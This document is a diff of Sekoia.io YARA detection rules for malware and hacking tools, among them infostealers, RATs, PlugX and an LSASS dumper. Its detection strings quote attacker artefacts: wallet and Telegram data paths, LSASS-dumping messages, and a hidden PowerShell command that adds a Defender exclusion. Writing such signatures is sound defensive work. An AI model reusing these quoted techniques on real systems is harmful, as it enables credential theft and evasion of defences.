+		uint32be( 0 ) == 0x6465780a and filesize < 10MB and ( ( any of ( $classes_* ) ) and ( 3 of ( $path_* ) ) )
 }
-rule SEKOIA_Apt_Queueseed : FILE
+rule SEKOIA_Tool_Multidump_Strings : FILE
 {
 	meta:
-		description = "Detects strings of Queueseed/Kapeka malware"
+		description = "Detects MultiDump"
 		author = "Sekoia.io"
-		id = "35f7ffd5-4f6f-4b31-8d60-c713a15d14e8"
-		date = "2024-04-22"
+		id = "4897c898-01dd-40d2-bf28-266231c88f8a"
+		date = "2024-03-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_queueseed.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "80d1135d63a351cabf45d2266c0ffc770e11669103107cd40caf00eb62c836ed"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_multidump_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8d98cf89d56f5a949023364f94c8d55f8875408b082fb52e118f99d46533124d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238767,20 +239635,15 @@ rule SEKOIA_Apt_Queueseed : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {2D 00 6F 00 00 00}
-		$ = {2D 00 62 00 63 00 00 00}
-		$ = {20 00 00 00 00 00 00 00}
-		$ = {20 00 2D 00 77 00 00 00}
-		$ = {35 00 3A 00 20 00 00 00}
-		$ = {34 00 3A 00 20 00 00 00}
-		$ = {33 00 3A 00 20 00 00 00}
-		$ = {32 00 3A 00 20 00 00 00}
-		$ = {31 00 3A 00 20 00 00 00}
-		$ = {50 00 49 00 44 00 20 00 3A 00 20 00 00 00 00 00}
-		$ = "ExitCode : " wide
+		$ = "--nodump\tDisable LSASS dumping"
+		$ = "-r 192.168.1.100:5000"
+		$ = "Path to save procdump.exe"
+		$ = "[!] CreateFileW [R] Failed With Error"
+		$ = "LSASS is Running, Continuin"
+		$ = "Dumping LSASS Using ProcDump"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 200KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
 
 rule SEKOIA_Backdoor_Win_Winordll64
@@ -238792,8 +239655,8 @@ rule SEKOIA_Backdoor_Win_Winordll64
 		date = "2023-02-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_winordll64.yar#L4-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_winordll64.yar#L4-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
 		logic_hash = "30e6f01f30d6ef11c75e133d309cebc87b69ede8eb38aa14d237760e99b52c54"
 		score = 75
 		quality = 80
@@ -238804,73 +239667,44 @@ rule SEKOIA_Backdoor_Win_Winordll64
 	condition:
 		hash.md5( pe.rich_signature.clear_data ) == "d16713cbfe04151b3a9e832c8afd55df" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3f638774c2565594029fb52ceb67db7a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f9416bfb43b2c70837927e43e7591a2a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6eede2cebaef39eec5bd1c24c809e3dc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1177658fb0469cd5982102c9f3cd2eea" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "658d877d1bf0d2928b2c3efec9ec06cf" ) or pe.imphash ( ) == "d6b6f8cdffb06f469e06c7af9639897c"
 }
-rule SEKOIA_Hafnium_Tarrask_Malware
-{
-	meta:
-		description = "Hunting rule to look for Tarrask malware"
-		author = "Sekoia.io"
-		id = "6f1728d6-dc9b-4ea7-8656-2b069ee269a0"
-		date = "2022-04-14"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hafnium_tarrask_malware.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f9309707d25cfe6bccf050f24e14c42b53f3d017916a02eaada74c4782efdd5c"
-		score = 50
-		quality = 76
-		tags = ""
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "delete sd success" wide ascii nocase
-		$s2 = "Task successfully registered." wide ascii nocase
 
-	condition:
-		all of them
-}
-rule SEKOIA_Launcher_Win_Romcom_Launcher : FILE
+rule SEKOIA_Plugx_Final_Payload : FILE
 {
 	meta:
-		description = "Detect the launcher of RomCom malware"
+		description = "Detects encrypted plugx config with a specific size"
 		author = "Sekoia.io"
-		id = "e8fa8239-a763-4be2-8f34-8e112e65b35e"
-		date = "2022-11-04"
+		id = "a4047324-81a7-4c17-be84-c0fa479d2f89"
+		date = "2023-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/launcher_win_romcom_launcher.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7d94f187c3fb85cbfe961dd3b292dc1abd36a8cee7c9ff9ec08c4c1e23d38588"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/plugx_final_payload.yar#L3-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bf5035eb7ed620edcf7a0e8e8be220451ce268fc49310f28059b60576d8c5182"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {43 3a 5c 55 73 65 72 73 5c 31 32 33 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73 5c 69 6e 73 5f 61 73 69 5c 57 69 6e 33 32 5c 52 65 6c 65 61 73 65 5c 73 65 74 75 70 2e 70 64 62}
+		$s1 = {30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 88 13 00 00 60 ea 00 00 ?? ?? ?? ?? 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".data" and $s1 in ( pe.sections [ i ] . raw_data_offset..pe.sections [ i ] . raw_data_offset + pe.sections [ i ] . raw_data_size ) )
 }
-rule SEKOIA_Unk_Quad7_Fsynet_Strings : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
 {
 	meta:
-		description = "Matches node-r-control, asr_node, node-relay"
+		description = "Find initial loader of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "897b2421-c177-48c0-8f5b-82d8434208cb"
-		date = "2024-08-20"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f00"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/unk_quad7_fsynet_strings.yar#L1-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f42849076e24b7827218f7a25bc11ccc"
-		hash = "b3b09819f820a4ecd31f82f369000af2"
-		hash = "92093dd7ba6ae8fe34a215c4c4bd1cd4"
-		hash = "e6f6a6de285d7c2361c32b1f29a6c3f6"
-		hash = "408152285671bbd0e6e63bd71d6abaaf"
-		hash = "5efc7d824851be9ec90a97d889a40d23"
-		logic_hash = "960119a025dedae7c5dfdf872cd515e2b6cf2999179ba84374d547047316caa2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_enigma_initial_loader.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "03b9d7296b01e8f3fb3d12c4d80fe8a1bb0ab2fd76f33c5ce11b40729b75fb23"
+		logic_hash = "b7687a480a2a633e7cc9a60d62f3392011712bd018ed634927419cfb4edb4a78"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238878,123 +239712,146 @@ rule SEKOIA_Unk_Quad7_Fsynet_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "prev_hop_port"
-		$ = "next_hop_port"
-		$ = "back_hop_port"
-		$ = "next_tsn_port"
-		$ = "prev_hop_ip"
-		$ = "next_hop_ip"
-		$ = "back_hop_ip"
-		$ = "next_tsn_ip"
-		$ = "ikcp_"
-		$ = "/tmp/log_r"
-		$ = "total_hop"
+		$str01 = "/getFile?file_id=" ascii
+		$str02 = "/file/bot" ascii
+		$str03 = "?file_id=" ascii
+		$str04 = "pInternetSetOptionA failed" wide
+		$str05 = "list_messages[file_path] failed" wide
+		$str06 = "iE&xit" wide
+		$str07 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
+		$str08 = "Telegram request failed" wide
+		$str09 = "bot getted" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 6 of them
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hta_Loader
+rule SEKOIA_Apt_Andariel_Dorarat_Strings : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 HTA loader"
+		description = "Detects Dora RAT based on strings"
 		author = "Sekoia.io"
-		id = "8e1889c1-c6ac-4048-9d3a-99ccbbd5435f"
-		date = "2024-07-25"
+		id = "30388291-a287-489f-a060-c90a16cda217"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_apt28_uac0063_hta_loader.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
-		logic_hash = "494331a8088d350e4e49e67fe64041d451886e501775413f908bd9b3faa98aeb"
-		score = 65
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_andariel_dorarat_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "21e1c77d486cbf6ddaa2eca673275c7c21cc59fa9551c2eb02c526518ed5b217"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HEAD><HTA:APPLICATION ID" ascii fullword
-		$ = "id=service>null</span" ascii fullword
-		$ = "script Language=\"VBScript.Encode" ascii fullword
+		$x1 = "/encryption.go" ascii fullword
+		$x2 = "/handshake.go" ascii fullword
+		$x3 = "/trans_module.go" ascii fullword
+		$enc_rsc = { 14 02 72 14 D3 4C 4A 49 55 36 14 DF 8D 6F 2D CF }
 
 	condition:
-		2 of them
+		uint16be( 0 ) == 0x4d5a and ( all of ( $x* ) or $enc_rsc )
 }
-rule SEKOIA_Malware_Valleyrat_Strings_Config : FILE
+rule SEKOIA_Infostealer_Win_Aurora : FILE
 {
 	meta:
-		description = "ValleyRAT strings based on HIVE KEYS and config. "
+		description = "Finds Aurora samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "bb186ab7-60cd-487e-8b9c-c2ff8f121454"
-		date = "2024-08-19"
+		id = "22ae81b4-647f-4b46-9b2a-dd96e0615d65"
+		date = "2022-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_valleyrat_strings_config.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b1887a48e59ac7b1b1742854d2a228af"
-		hash = "f6c69e83ce61aacacfbc410345008268"
-		hash = "63ad42e03aca6ce447fb447e21aeb385"
-		hash = "e1d41e5fdfebf8062911ef3c3853b807"
-		hash = "e6cafb4136a9438227086a5826eafe10"
-		hash = "54ba4bbeacd1521164a40e92262b15f6"
-		logic_hash = "89a3d3ca32f9c57e932686f0ed03821350770f82e598948ed86414e231e27a30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_aurora.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e88cbb012ffb65aa8a70b76163a834c0bc4615b0effc93945c6d915e33c04549"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$key1 = "IpDateInfo" ascii fullword
-		$key2 = "IpDate" ascii fullword
-		$key3 = "SelfPath" ascii fullword
-		$config1 = {7c 00 69 00 3a 00 }
-		$config2 = {7c 00 70 00 3a 00 }
+		$str00 = "I'm a teapot" ascii
+		$str01 = "wmic cpu get name" ascii
+		$str02 = "wmic path win32_VideoController get" ascii
+		$str03 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
+		$str04 = "Exodus\\exodus.wallet" ascii
+		$str05 = "PaliWallet" ascii
+		$str06 = "cookies.sqlite" ascii
+		$str07 = "Startup\\Documents\\User Data" ascii
+		$str08 = "atomic\\Local Storage\\leveldb" ascii
+		$str09 = "com.liberty.jaxx\\IndexedDB" ascii
+		$str10 = "Guarda\\Local Storage\\leveldb" ascii
+		$str11 = "AppData\\Roaming\\Telegram Desktop\\tdata" ascii
+		$str12 = "Ethereum\\keystore" ascii
+		$str13 = "Coin98" ascii
+		$str14 = ".bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.xml.zip" ascii
+		$str15 = "type..eq.main.Grabber" ascii
+		$str16 = "type..eq.main.Loader_A" ascii
+		$str17 = "type..eq.net/http.socksUsernamePassword" ascii
+		$str18 = "powershell" ascii
+		$str19 = "start-process" ascii
+		$str20 = "http/httpproxy" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of ( $key* ) and $config2 in ( @config1 .. @config1 + 100 ) and filesize > 300KB and filesize < 100MB
+		uint16( 0 ) == 0x5A4D and 15 of them and filesize > 4MB
 }
-rule SEKOIA_Hacktool_Sharpview_Strings : FILE
+rule SEKOIA_Infostealer_Win_Stealerium : FILE
 {
 	meta:
-		description = "Detects SharpView based on strings."
+		description = "Detects Stealerium based on specific strings"
 		author = "Sekoia.io"
-		id = "585ead98-36d0-402c-b527-4dec308cb1c9"
-		date = "2022-02-14"
+		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_sharpview_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "762e8d292e052cb0922743c2f5b14170e91fe440e05331892b20b5921e0559da"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_stealerium.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f420848164ad4b6966f2a776a58d90b7d70c8b151a42d6f56b654f1700b5e564"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Args_Get_DomainGPOComputerLocalGroupMapping"
-		$ = "Args_Get_ForestGlobalCatalog"
-		$ = "Args_Find_DomainLocalGroupMember"
-		$ = "Args_Get_DomainFileServer"
-		$ = "Ex: SharpView.exe Method-Name" wide
-		$ = "[Get-PathAcl] error: {0}" wide
+		$stl = "Stealerium" ascii wide
+		$str01 = "Processe: " wide
+		$str02 = "Compname: " wide
+		$str03 = "Language: " wide
+		$str04 = "SandBoxie: " wide
+		$str05 = "== System Info ==" wide
+		$str06 = "== Hardware ==" wide
+		$str07 = "== Domains ==" wide
+		$str08 = "WEBCAMS COUNT: " wide
+		$str09 = "[Virtualization]" wide
+		$str10 = "[Open google maps](" wide
+		$str11 = "Remember password: " wide
+		$str12 = "Target.Browsers.Firefox" ascii
+		$str13 = "Modules.Keylogger" ascii
+		$str14 = "ClipperAddresses" ascii
+		$str15 = "ChromiumPswPaths" ascii
+		$str16 = "DetectedBankingServices" ascii
+		$str17 = "DetectCryptocurrencyServices" ascii
+		$str18 = "CheckRemoteDebuggerPresent" ascii
+		$str19 = "GetConnectedCamerasCount" ascii
+		$str20 = "costura.discord-webhook-client.dll.compressed" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 800KB and 5 of them
+		uint16( 0 ) == 0x5A4D and filesize > 1MB and ( ( #stl > 5 and 2 of ( $str* ) ) or 15 of ( $str* ) )
 }
-rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
+rule SEKOIA_Malware_Remcom_Strings : FILE
 {
 	meta:
-		description = "Encrypted C2 configuration of micDown"
+		description = "Detects RemCom based on strings"
 		author = "Sekoia.io"
-		id = "9567d68b-05d1-4d41-b87f-c8691ee689cd"
-		date = "2023-08-24"
+		id = "7a56d55a-2f35-41ef-b7af-259baf215a62"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_micdown_encrypted_configuration.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9b80bd284f9aa9e4073bdead7bb0c5412ec1809c36a85dfd35d9ea7ac62da8a3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_remcom_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a46bb87bf4722303d33707afb19c8d4f209b98a88552363363520536911469ae"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239002,23 +239859,28 @@ rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {?? [20] 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 84 36}
+		$ = "RemComSvc"
+		$ = "RemCom_stderr"
+		$ = "RemCom_stdin"
+		$ = "\\\\.\\pipe\\%s%s%d"
+		$ = "RemCom_stdout"
+		$ = "\\\\.\\pipe\\RemCom_communicaton"
 
 	condition:
-		filesize == 66 and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Rat_Win_Arrow_Str : FILE
+rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
 {
 	meta:
-		description = "Finds Arrow RAT samples based on the specific malware strings"
+		description = "Serpent Stealer string"
 		author = "Sekoia.io"
-		id = "69f6572c-91ed-4fb6-b886-5ad2dabef3d3"
-		date = "2022-08-19"
+		id = "ad9e2366-c95e-4090-a0db-48f3cc325209"
+		date = "2023-12-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_arrow_str.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "faf66a14e563066bb86ceadc787c092a5a13a43f936f0d9d19fbe7d4352ea5d8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_infostealer_serpent_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5266d1c8228f02e8ac9da5ddd8b968fde0d0e83afa408d405ec4ca50c3453928"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239026,72 +239888,57 @@ rule SEKOIA_Rat_Win_Arrow_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$hvnc01 = "DESKTOP_JOURNALRECORD" ascii
-		$hvnc02 = "DESKTOP_ENUMERATE" ascii
-		$hvnc03 = "DESKTOP_SWITCHDESKTOP" ascii
-		$hvnc04 = "DESKTOP_CREATEWINDOW" ascii
-		$hvnc05 = "StartHVNC" ascii
-		$str01 = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c" wide
-		$str02 = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath" wide
-		$str03 = "cvtres.exe" wide
-		$str04 = "qbkTHriRRbQjaArtJfF" wide
-		$str05 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=" wide
-		$str06 = "Stub.exe" ascii wide
-		$str07 = "DePikoloData" ascii
+		$s1 = "User Has SSH Dir." wide
+		$s2 = "[+] Executing Wallets" wide
+		$s3 = "'serpent' folder" wide
+		$s4 = "Buddy Kys!!!" wide
+		$s5 = "http://checkip.dyndns.org/" wide
+		$s6 = "[+] Target has discord installed" wide
+		$s7 = "Target has minecraft." wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of ( $hvnc* ) and 5 of ( $str* )
+		( uint16be( 0 ) == 0x4d5a ) and filesize < 100KB and 5 of them
 }
-rule SEKOIA_Apt_Mustangpanda_Zpakage : FILE
+
+rule SEKOIA_Loader_Win_Ninerat
 {
 	meta:
-		description = "Detect obfuscation seen in ZPAKAGE"
+		description = "Detect the NineRAT instrumentator"
 		author = "Sekoia.io"
-		id = "a4767d12-5058-4a26-be62-0cec685917bd"
-		date = "2023-03-27"
+		id = "b9aa3ddc-7892-402f-b045-182884ee9bad"
+		date = "2023-12-12"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_zpakage.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "711c0e83f4e626a7b54e3948b281a71915a056c5341c8f509ecba535bc199bee"
-		logic_hash = "52ad51589ca154fbf6e5829a2c80a9b811809288bed6995820a0ca8aa218d8ef"
+		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_ninerat.yar#L4-L37"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eab81277a2ffe926c2d9f990ee2e36f0e5f27a14d3048c50d31952d90ce7ab0b"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4"
+		hash2 = "5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541"
 
 	strings:
-		$chunk_1 = {
-        88 94 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        8A 84 1D ?? ?? ?? ??
-        83 ?? ??
-        88 84 1D ?? ?? ?? ??
-        0F BE 8C 1D ?? ?? ?? ??
-        0F BE 84 1D ?? ?? ?? ??
-        }
+		$ = "TelegramRat\\lastest\\Dropper"
+		$ = "\\Release\\ServiceMid.pdb"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and filesize < 11MB and #chunk_1 > 20
+		all of them or pe.imphash ( ) == "104a3dc970a385f64de39e0dad61a9a2" or hash.md5 ( pe.rich_signature.clear_data ) == "aab0aa6b89d883e42be8b65a4e41a139" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "827d5fd4b1a0426037529ee9bba48da0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82354f92508dcb33acda01c226de2975" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ccd0f5d837a6cc05a861f040cbdfe080" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8d2c169356afe8b53b0ecb83de3084b9" )
 }
-rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
+rule SEKOIA_Malware_Venom_Admin_Strings : FILE
 {
 	meta:
-		description = "Detects MustangPanda infected ThumbDrive"
+		description = "Detects Venom admin strings"
 		author = "Sekoia.io"
-		id = "e7cc5ecc-2369-49ff-9e35-c9faeb69acda"
-		date = "2023-09-21"
+		id = "4929340c-310b-4c59-a111-23409f973d22"
+		date = "2022-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_malicious_lnk_worm.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ca19a925af695cbbb41fdfbb161dceafeb8aae6d42000cc09bb07e1dbdfdb9e5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_venom_admin_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "205f16b07f58290b2898de7a7dd1e20f3d7651d738f0b15bf810f9be66eedf3d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239099,53 +239946,57 @@ rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RECYCLER.BIN\\1\\CEFHelper.exe" wide
+		$ = "/admin/admin.go"
+		$ = "/cli/interactive.go"
+		$ = "/cli/cli.go"
+		$ = "/dispather/sender.go"
+		$ = "/dispather/proxy.go"
+		$ = "/dispather/handler.go"
+		$ = "/dispather/forward.go"
+		$ = "/utils/reuse_port.go"
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and 1 of them
+		filesize < 11MB and 6 of them
 }
-rule SEKOIA_Apt_Apt31_Pakdoor : FILE
+rule SEKOIA_Hacktool_Earthworm_Strings : FILE
 {
 	meta:
-		description = "Detects APT31 ORB implant - 2019/2021"
+		description = "Detects Mac/Win/Linux EarthWorm based on strings"
 		author = "Sekoia.io"
-		id = "463b8d0d-30f4-45ed-8f19-4b32436fbbf0"
-		date = "2021-10-11"
+		id = "6c9b0225-8c41-49f9-9745-245bc7ef942f"
